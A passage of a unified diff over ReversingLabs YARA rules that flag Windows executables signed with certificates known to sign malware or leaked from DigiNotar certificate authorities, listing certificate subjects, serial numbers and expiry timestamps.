-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and ( pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" or pe.signatures [ i ] . serial == "95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" ) and 1604933746 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cd ingegneri associati srl" and pe.signatures [ i ] . serial == "1a:35:ac:ce:5b:0c:77:20:6b:1c:3d:c2:a6:a2:41:7c" and 1166054399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Eb40Ea11Eaac847B050De9B59E25Bdc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc3f54a6-723d-5de5-9a59-2be8a005cedc"
+		id = "e9f94ae9-0158-5789-b4d2-88f750442274"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6618-L6634"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L693-L709"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b9fb2e3cc150b0278e67c673f7c01174c30b2cc4458c9c5e573661071795b793"
+		logic_hash = "d0e7ab78fb42c9a8f19cba8e6a8b15d584651a23f1088e1f311589d46145e963"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16253,21 +38647,21 @@ rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Istok" and pe.signatures [ i ] . serial == "13:35:65:77:98:08:c3:b7:9d:8e:3f:70:a9:c3:ff:ac" and 1605019819 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "My Free Internet Update" and pe.signatures [ i ] . serial == "6e:b4:0e:a1:1e:aa:c8:47:b0:50:de:9b:59:e2:5b:dc" and 1062201599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6724340Ddbc7252F7Fb714B812A5C04D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4668ceb3-8bf2-5be4-9a1a-d0d902c35cf0"
+		id = "2b61de88-9fea-5c3f-a7ab-db91e90b4965"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6636-L6654"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L711-L727"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f13f9b70a2a3187522e4fff45a8a425863ad6242f82592aa9319c8d5fddeeefa"
+		logic_hash = "bc72c2ca5f81198684233e23260831da5b9ef4e7ac5a25abbdb303eecc38bd53"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16277,21 +38671,21 @@ rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and ( pe.signatures [ i ] . serial == "00:7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" or pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" ) and 1606159604 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YNK JAPAN Inc" and pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" and 1306195199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0813Ee9B7B9D7C46001D6Bc8784Df1Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "871e399f-8498-5d66-ab5e-24e48491124f"
+		id = "0915fae0-ac6f-5a92-ab44-80f840fd5061"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6656-L6674"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L729-L745"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1020250fc5030e50bc1e7d0f0c5a77e462a53f47bfcc4383c682b34fed567492"
+		logic_hash = "1a25a2f25fa8d5075113cbafb73e80e741268d6b2f9e629fd54ffca9e82409b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16301,21 +38695,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fort LLC" and ( pe.signatures [ i ] . serial == "00:ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" or pe.signatures [ i ] . serial == "ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" ) and 1604937337 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Les Garcons s'habillent" and pe.signatures [ i ] . serial == "08:13:ee:9b:7b:9d:7c:46:00:1d:6b:c8:78:4d:f1:dd" and 1334707199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_530591C61B5E1212F659138B7Cea0A97 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2a949015-3b7b-5123-8df1-f2199ef636c9"
+		id = "71cf0653-5aab-5d5c-aa3a-f42f40196412"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6676-L6692"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L747-L763"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "49d6fd8b325df4bc688275a09cee35e1040172eb6f3680aa2b6f0f3640c0782e"
+		logic_hash = "0ef01e542d145475713bbd373bdcdae5f25bfd823a60e7d40fe9a6b6039c83e0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16325,21 +38719,21 @@ rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" and 1586942863 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x97\\xA5\\xE7\\x85\\xA7\\xE5\\xB3\\xB0\\xE5\\xB7\\x9D\\xE5\\x9B\\xBD\\xE9\\x99\\x85\\xE7\\x9F\\xBF\\xE4\\xB8\\x9A\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "53:05:91:c6:1b:5e:12:12:f6:59:13:8b:7c:ea:0a:97" and 1403654399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07270Ff9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "adff6ae2-076c-5c97-9fea-f95d770a3821"
+		id = "fcd2d82a-b51d-53ff-bfae-3c83147c1903"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6694-L6710"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L765-L781"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e36ae57d715a71aa7d26dd003d647dfa7ab16d64e5411b6c49831544fc482645"
+		logic_hash = "8f0da7c330464184fa1d5bf8d51dd8ad2e8637710a36972dcab03629cb57e910"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16349,21 +38743,21 @@ rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "3e:26:7b:5d:14:cd:f1:f6:45:c1:ec:54:5c:ec:3a:ee" and 1579825892 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:0f:f9" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0727100D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "5b8e7730-cb8b-5c51-9784-d944453bc898"
+		id = "1ee866ec-a445-5a79-b824-37f28a49f20b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6712-L6730"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L783-L799"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "23570962c80bddce28a3dee9d4d864cf3cf64018eec6fbcbdd3ca2658c9f660f"
+		logic_hash = "a09f4004ed002b90d67a3baddde74832e6c7b70e8b330347ef169460750aa344"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16373,21 +38767,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES PROPERTIES LIMITED" and ( pe.signatures [ i ] . serial == "00:ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" or pe.signatures [ i ] . serial == "ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" ) and 1578566034 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:0d" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07271003 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "f0050a52-65d5-54b2-b06d-08812af98948"
+		id = "7573c436-5bf9-5522-9952-e30dbbccd092"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6732-L6750"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L801-L817"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "230d33f0d1d31d4cb76bf3b13f109d3cc9ace846daef145e1dc7666b33c8a42a"
+		logic_hash = "14c201b4fdda5b3553732a173a3d6705129c54f2a50d26997d63a77be8504285"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16397,21 +38791,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and ( pe.signatures [ i ] . serial == "00:fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" or pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" ) and 1604019600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:03" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_013134Bf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "f597956a-d11b-54e4-91b6-0572c0b10279"
+		id = "a3292707-c481-56a8-abf9-e1a762c76cb6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6752-L6770"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L819-L835"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4193fce69af03b3521a3cc442b762c52f8585b44fa6b0bd78b9ace171b807ed4"
+		logic_hash = "1ade100c310c22bce25bcc6687855bd4eb6364b64cf31514b2548509a16e4a36"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16421,21 +38815,21 @@ rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUTAKS, OOO" and ( pe.signatures [ i ] . serial == "00:7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" or pe.signatures [ i ] . serial == "7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" ) and 1599611338 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Organisatie - G2" and pe.signatures [ i ] . serial == "01:31:34:bf" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01314476 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "1e5a2708-2875-50ab-af6b-3be91f38e13f"
+		id = "e0a52ad1-cebd-5ffc-953f-e0b09fc6d710"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6772-L6788"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L837-L853"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6b62d5c7a3c6e3096797cd2f515d86045fa77682638bda44175d05c5b6c5bbc0"
+		logic_hash = "6f2f3f3ae009fbb9ebe589fc6b640be89c4a7b734eda515f182c7e9c9ffb4779"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16445,21 +38839,21 @@ rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" and 1597971601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid" and pe.signatures [ i ] . serial == "01:31:44:76" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_013169B0 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "1e61a781-d5fb-5f05-81c4-3cc697ece13c"
+		id = "a5f68c0a-635a-5aa9-94d2-7628999f06c2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6790-L6806"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L855-L871"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1a55856bfa4c632b2b0404686dc7ba5e7238b619dd4d2eb68c3d291bc86e52c4"
+		logic_hash = "354421ebad7fd0b73c9ba63630c91d481901ca9ec39be3c6b66843221e4b5aad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16469,21 +38863,21 @@ rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" and 1604036657 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid en Bedrijven" and pe.signatures [ i ] . serial == "01:31:69:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C76Da9C910C4E2C9Efe15D058933C4C : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "574ee0d4-ba7c-5c74-b711-222f92196f4a"
+		id = "a9b06d49-1ab2-539e-bd1f-16da40b654b2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6808-L6826"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L873-L889"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "324de84cb8c2f5402c9326749e3456e11312828df2523954fd84f7fb3298fdf3"
+		logic_hash = "883e93bff42161ba68f69fb17f7e78377d7f3cb6b6cdf72cffb4166466f8bc7b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16493,21 +38887,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and ( pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" or pe.signatures [ i ] . serial == "fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" ) and 1603958571 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_469C2Caf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "7a829a63-eeb4-50ef-829d-fc13572c1148"
+		id = "12d7c4a8-0a84-502a-855b-674972a2e2e1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6828-L6844"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L891-L907"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f3184a9d1fe2a1cf2dcc04d26c284aa9a651d2f00aa28642d7f951550a050138"
+		logic_hash = "2490dbd74a5d3eede494d284f96af835c270d2fb0752b887aadbaf92bf34e6d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16517,21 +38911,21 @@ rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVATON, s.r.o." and pe.signatures [ i ] . serial == "0e:6f:4c:b8:b0:6e:01:c3:bd:29:6a:ce:3a:95:f8:14" and 1603957781 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:2c:af" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_469C3Cc9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "7d27604e-4ecd-559c-9180-4914e7f1f6c9"
+		id = "36d76a9f-d18f-56bf-b00a-f7320f04f39a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6846-L6862"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L909-L925"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "50ff48a421a109f8c6bf92032691d9b673945bc591005004ff17dc18c97d4aea"
+		logic_hash = "7327b7cbeb616bc46c82975aed6b3ea1caafa74fd431e2d98ca55b00851e22c8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16541,21 +38935,21 @@ rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" and 1597971601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:3c:c9" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A82Bd1E144E8814D75B1A5527Bebf3E : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "ac86893f-2edd-5f1c-96eb-4cb140e8e001"
+		id = "f3d7d714-8085-524a-814c-ab8cc59ceb4f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6864-L6880"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L927-L943"
